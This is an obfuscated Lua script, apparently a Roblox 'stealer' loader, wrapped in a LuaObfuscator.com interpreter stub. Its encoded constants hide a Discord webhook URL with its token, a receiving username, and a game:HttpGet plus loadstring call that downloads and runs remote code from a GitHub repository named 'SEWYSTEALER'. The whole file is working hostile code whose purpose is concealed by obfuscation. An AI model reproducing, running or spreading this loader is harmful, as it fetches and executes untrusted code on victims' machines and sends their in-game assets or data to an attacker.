--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (2==v18) then function v23()local v31,v32=v1(v16,v19,v19 + 2 );v19=v19 + (5 -3) ;return (v32 * (732 -476)) + v31 ;end v24=nil;function v24()local v33,v34,v35,v36=v1(v16,v19,v19 + (5 -2) );v19=v19 + (10 -6) ;return (v36 * 16777216) + (v35 * (66155 -(555 + 64))) + (v34 * 256) + v33 ;end v25=nil;v18=3;end if (v18==5) then v30=nil;function v30(v37,v38,v39)local v40=0;local v41;local v42;local v43;while true do if (0==v40) then v41=v37[1];v42=v37[2];v40=1;end if (1==v40) then v43=v37[3];return function(...)local v80=v41;local v81=v42;local v82=v43;local v83=v28;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v100=0,v88 do if (v100>=v82) then v86[v100-v82 ]=v87[v100 + 1 ];else v90[v100]=v87[v100 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do local v101=0;while true do if (0==v101) then v92=v80[v84];v93=v92[1];v101=1;end if (1==v101) then if (v93<=4) then if (v93<=1) then if (v93>0) then v90[v92[2]]();else local v112=0;while true do if (v112==8) then v90[v92[2]]=v39[v92[3]];v84=v84 + 1 ;v92=v80[v84];v112=9;end if (v112==0) then v90[v92[2]]=v39[v92[3]];v84=v84 + 1 ;v92=v80[v84];v112=1;end if (v112==2) then v90[v92[2]]=v39[v92[3]];v84=v84 + 1 ;v92=v80[v84];v112=3;end if (v112==3) then v90[v92[2]][v92[3]]=v92[4];v84=v84 + 1 ;v92=v80[v84];v112=4;end if (v112==7) then v90[v92[2]][v92[3]]=v92[4];v84=v84 + 1 ;v92=v80[v84];v112=8;end if (v112==1) then v90[v92[2]][v92[3]]=v92[4];v84=v84 + 1 ;v92=v80[v84];v112=2;end if (4==v112) then v90[v92[2]]=v39[v92[3]];v84=v84 + 1 ;v92=v80[v84];v112=5;end if (v112==5) then v90[v92[2]][v92[3]]=v92[4];v84=v84 + 1 ;v92=v80[v84];v112=6;end if (6==v112) then v90[v92[2]]=v39[v92[3]];v84=v84 + 1 ;v92=v80[v84];v112=7;end if (v112==9) then v90[v92[2]][v92[3]]=v92[4];break;end end end elseif (v93<=2) then v90[v92[2]]=v92[3];elseif (v93>3) then do return;end else local v122=v92[2];local v123,v124=v83(v90[v122](v13(v90,v122 + 1 ,v92[3])));v85=(v124 + v122) -1 ;local v125=0;for v178=v122,v85 do local v179=0;while true do if (v179==0) then v125=v125 + 1 ;v90[v178]=v123[v125];break;end end end end elseif (v93<=7) then if (v93<=5) then local v115=0;local v116;while true do if (v115==0) then v116=v92[2];v90[v116]=v90[v116](v13(v90,v116 + 1 ,v85));break;end end elseif (v93>6) then v90[v92[2]][v92[3]]=v92[4];else local v128;local v129,v130;local v131;local v132;v90[v92[2]]=v39[v92[3]];v84=v84 + 1 ;v92=v80[v84];v132=v92[2];v131=v90[v92[3]];v90[v132 + 1 ]=v131;v90[v132]=v131[v92[4]];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v92[3];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v92[3]~=0 ;v84=v84 + 1 ;v92=v80[v84];v132=v92[2];v129,v130=v83(v90[v132](v13(v90,v132 + 1 ,v92[3])));v85=(v130 + v132) -1 ;v128=0;for v182=v132,v85 do local v183=0;while true do if (v183==0) then v128=v128 + 1 ;v90[v182]=v129[v128];break;end end end v84=v84 + 1 ;v92=v80[v84];v132=v92[2];v90[v132]=v90[v132](v13(v90,v132 + 1 ,v85));v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]();v84=v84 + 1 ;v92=v80[v84];do return;end end elseif (v93<=8) then v90[v92[2]]=v92[3]~=0 ;elseif (v93>9) then v90[v92[2]]=v39[v92[3]];else local v144=v92[2];local v145=v90[v92[3]];v90[v144 + 1 ]=v145;v90[v144]=v145[v92[4]];end v84=v84 + 1 ;break;end end end end;end end end return v30(v29(),{},v17)(...);end if (v18==1) then function v21(v44,v45,v46)if v46 then local v68=931 -(857 + 74) ;local v69;while true do if (v68==(1065 -(68 + 997))) then v69=(v44/(2^(v45-((1051 -482) -(367 + 201)))))%((1272 -((414 -188) + 1044))^(((v46-(928 -(214 + 713))) -(v45-(1 + 0))) + 1 + 0)) ;return v69-(v69%(878 -((632 -(87 + 263)) + 595))) ;end end else local v70=(2 + 0)^(v45-(1638 -((1703 -(67 + 113)) + 84 + 30))) ;return (((v44%(v70 + v70))>=v70) and (1 + (0 -0))) or (0 -0) ;end end v22=nil;function v22()local v47=(0 -0) + 0 ;local v48;while true do if (v47==(0 -0)) then v48=v1(v16,v19,v19);v19=v19 + 1 ;v47=3 -(2 + 0) ;end if (v47==(953 -(802 + 150))) then return v48;end end end v23=nil;v18=2;end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v49=0 + 0 ;local v50;local v51;local v52;local v53;local v54;local v55;local v56;while true do if ((938 -(39 + 896))==v49) then v56=nil;while true do local v94=0 -0 ;local v95;local v96;while true do if ((0 -0)~=v94) then else v95=0 -0 ;v96=nil;v94=1;end if ((1 + 0)==v94) then while true do if (v95==(0 + 0)) then v96=0;while true do if (v96==0) then local v111=396 -(115 + 281) ;while true do if (v111~=0) then else if (v50==0) then local v184=0;local v185;local v186;while true do if (v184==(2 -1)) then while true do if (v185==(0 + 0)) then v186=0 -0 ;while true do if (v186~=(3 -2)) then else v53={};v50=1;break;end if ((867 -(550 + 317))~=v186) then else v51={};v52={};v186=1;end end break;end end break;end if (v184==0) then v185=0 -0 ;v186=nil;v184=1 -0 ;end end end if (v50==2) then local v187=0;while true do if (1~=v187) then else for v195=2 -1 ,v24() do local v196=0;local v197;while true do if (v196~=(285 -(134 + 151))) then else v197=v22();if (v21(v197,1666 -(970 + 695) ,1 -0 )~=(1990 -(582 + 1408))) then else local v207=0 -0 ;local v208;local v209;local v210;while true do if (v207~=(2 -0)) then else local v213=0;local v214;while true do if ((0 -0)==v213) then v214=0;while true do if (v214==0) then local v226=0;while true do if (v226~=(1825 -(1195 + 629))) then else v214=1 -0 ;break;end if (v226~=(241 -(187 + 54))) then else if (v21(v209,781 -(162 + 618) ,1 + 0 )==1) then v210[2 + 0 ]=v56[v210[2]];end if (v21(v209,2,2)~=(1 -0)) then else v210[4 -1 ]=v56[v210[1 + 2 ]];end v226=1;end end end if (v214==(1637 -(1373 + 263))) then v207=3;break;end end break;end end end if (v207==3) then if (v21(v209,3,1003 -(451 + 549) )==(1 + 0)) then v210[5 -1 ]=v56[v210[6 -2 ]];end v51[v195]=v210;break;end if (v207==(1385 -(746 + 638))) then v210={v23(),v23(),nil,nil};if (v208==(1581 -(1535 + 46))) then local v218=0;local v219;local v220;local v221;while true do if (v218~=1) then else v221=nil;while true do if (v219==(1 + 0)) then while true do if (v220==0) then v221=0;while true do if (v221==0) then v210[3]=v23();v210[1 + 3 ]=v23();break;end end break;end end break;end if ((560 -(306 + 254))==v219) then local v228=0 + 0 ;while true do if (v228==0) then v220=0 -0 ;v221=nil;v228=1468 -(899 + 568) ;end if (1==v228) then v219=1 + 0 ;break;end end end end break;end if (v218==(0 -0)) then v219=0;v220=nil;v218=1;end end elseif (v208==1) then v210[3]=v24();elseif (v208==(605 -(268 + 335))) then v210[293 -(60 + 230) ]=v24() -((574 -(426 + 146))^(2 + 14)) ;elseif (v208==3) then local v229=1456 -(282 + 1174) ;local v230;local v231;local v232;while true do if ((811 -(569 + 242))==v229) then v230=0;v231=nil;v229=1;end if (v229==1) then v232=nil;while true do if (v230==(2 -1)) then while true do if (v231~=(0 + 0)) then else v232=0;while true do if (v232==0) then v210[1027 -(706 + 318) ]=v24() -(2^16) ;v210[4]=v23();break;end end break;end end break;end if ((1251 -(721 + 530))==v230) then local v240=0;while true do if (v240~=1) then else v230=1272 -(945 + 326) ;break;end if (v240~=0) then else v231=0;v232=nil;v240=2 -1 ;end end end end break;end end end v207=2 + 0 ;end if (v207==(700 -(271 + 429))) then v208=v21(v197,2,3 + 0 );v209=v21(v197,4,6);v207=1;end end end break;end end end v50=3;break;end if (v187==0) then for v198=1501 -(1408 + 92) ,v55 do local v199=0;local v200;local v201;local v202;local v203;local v204;while true do if (v199~=(1088 -(461 + 625))) then else v204=nil;while true do if (v200~=0) then else local v211=0;while true do if (v211==(1289 -(993 + 295))) then v200=1 + 0 ;break;end if (v211==(1171 -(418 + 753))) then v201=0 + 0 ;v202=nil;v211=1;end end end if (v200==(1 + 1)) then while true do if (v201==0) then v202=0 + 0 ;v203=nil;v201=1 + 0 ;end if (v201==(530 -(406 + 123))) then v204=nil;while true do if (v202==(1770 -(1749 + 20))) then if (v203==1) then v204=v22()~=(0 + 0) ;elseif (v203==(1324 -(1249 + 73))) then v204=v25();elseif (v203==(2 + 1)) then v204=v26();end v56[v198]=v204;break;end if (0==v202) then local v224=1145 -(466 + 679) ;local v225;while true do if (v224==(0 -0)) then v225=0 -0 ;while true do if (v225==(1900 -(106 + 1794))) then local v233=0;while true do if (v233==(0 + 0)) then v203=v22();v204=nil;v233=1;end if (v233==1) then v225=1 + 0 ;break;end end end if (v225==(2 -1)) then v202=2 -1 ;break;end end break;end end end end break;end end break;end if (v200==1) then local v212=114 -(4 + 110) ;while true do if ((584 -(57 + 527))==v212) then v203=nil;v204=nil;v212=1;end if (v212==1) then v200=1429 -(41 + 1386) ;break;end end end end break;end if (v199~=0) then else v200=0;v201=nil;v199=104 -(17 + 86) ;end if (v199~=1) then else v202=nil;v203=nil;v199=2;end end end v54[3]=v22();v187=1;end end end v111=1 + 0 ;end if (v111==(1 -0)) then v96=1;break;end end end if (v96==(2 -1)) then if (v50~=(167 -(122 + 44))) then else local v118=0 -0 ;local v119;while true do if (v118~=(0 -0)) then else v119=0;while true do if (v119==0) then local v193=0 + 0 ;while true do if (v193==(0 + 0)) then v54={v51,v52,nil,v53};v55=v24();v193=1;end if (v193==(1258 -(1043 + 214))) then v119=1;break;end end end if (v119==1) then v56={};v50=7 -5 ;break;end end break;end end end if (v50~=(1215 -(323 + 889))) then else local v120=0 -0 ;local v121;while true do if (v120~=(580 -(361 + 219))) then else v121=320 -(53 + 267) ;while true do if (v121~=0) then else local v194=0;while true do if (0~=v194) then else for v205=1 + 0 ,v24() do v52[v205-(414 -(15 + 398)) ]=v29();end return v54;end end end end break;end end end break;end end break;end end break;end end end break;end if (1==v49) then local v77=0;while true do if (v77~=(983 -(18 + 964))) then else v49=2;break;end if (v77~=(0 -0)) then else local v103=0 + 0 ;while true do if (v103~=(1 + 0)) then else v77=851 -(20 + 830) ;break;end if (v103~=(0 + 0)) then else v52=nil;v53=nil;v103=127 -(116 + 10) ;end end end end end if ((0 + 0)==v49) then local v78=738 -(542 + 196) ;while true do if (v78~=0) then else v50=0;v51=nil;v78=1;end if (v78==1) then v49=1;break;end end end if ((3 -1)==v49) then local v79=0 + 0 ;while true do if ((0 + 0)==v79) then v54=nil;v55=nil;v79=1 + 0 ;end if (v79==1) then v49=3;break;end end end end end v18=5;end if (0==v18) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v57)if (v1(v57,2)==79) then local v71=0;while true do if (v71==0) then v20=v0(v3(v57,1,1));return "";end end else local v72=0;local v73;while true do if (v72==0) then v73=v2(v0(v57,16));if v20 then local v108=v5(v73,v20);v20=nil;return v108;else return v73;end break;end end end end);v21=nil;v18=1;end if (v18==3) then function v25()local v58=v24();local v59=v24();local v60=2 -1 ;local v61=(v21(v59,2 -1 ,1571 -(1126 + 425) ) * ((407 -(118 + 287))^((461 -(144 + 192)) -93))) + v58 ;local v62=v21(v59,7 + 14 ,1152 -(118 + 1003) );local v63=((v21(v59,(1001 -(42 + 174)) -(239 + 514) )==(1 + 0)) and  -(2 -1)) or (378 -(142 + 235)) ;if (v62==0) then if (v61==(0 -0)) then return v63 * (0 -0) ;else local v97=0 + 0 ;while true do if (v97==(0 + 0)) then v62=978 -(553 + 424) ;v60=(0 + 0) -(0 + 0) ;break;end end end elseif (v62==(1804 + 243)) then return ((v61==(0 -0)) and (v63 * (1/(0 + 0)))) or (v63 * NaN) ;end return v8(v63,v62-(596 + 427) ) * (v60 + (v61/((1 + 1)^(23 + 29)))) ;end v26=nil;function v26(v64)local v65=0;local v66;local v67;while true do if (v65==3) then return v6(v67);end if (v65==(1506 -(363 + 1141))) then v67={};for v98=1581 -(1183 + 397) , #v66 do v67[v98]=v2(v1(v3(v66,v98,v98)));end v65=3;end if (v65==(0 -0)) then v66=nil;if  not v64 then local v102=0 + 0 ;while true do if (v102==((0 -0) + (1661 -(1477 + 184)))) then v64=v24();if (v64==((2690 -715) -(1913 + 62))) then return "";end break;end end end v65=1 + 0 ;end if (v65==1) then v66=v3(v16,v19,(v19 + v64) -(2 -1) );v19=v19 + v64 ;v65=1935 -(565 + 1368) ;end end end v27=v24;v18=4;end end end v15("LOL!0D3O0003023O005F4703083O00557365724E616D65030C3O0067616C6178795F697364616403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313234332O313435303633352O32333130322F57302O566B42697259686656414A7179724E7973616A622D2O776F45487131546153527054795972554E392O7456796E53493958786B702O5179765F6962784A736B706E030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403473O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D7568612O6D61643432342F53455759535445414C45522F6D61696E2F6D61696E2E6C756100133O00124O00013O00304O0002000300124O00013O00304O0004000500124O00013O00304O0006000700124O00013O00304O0008000700124O00013O00304O0009000700120A3O000A3O0012060001000B3O00202O00010001000C00122O0003000D6O000400016O000100049O0000026O000100016O00017O00",v9(),...);end
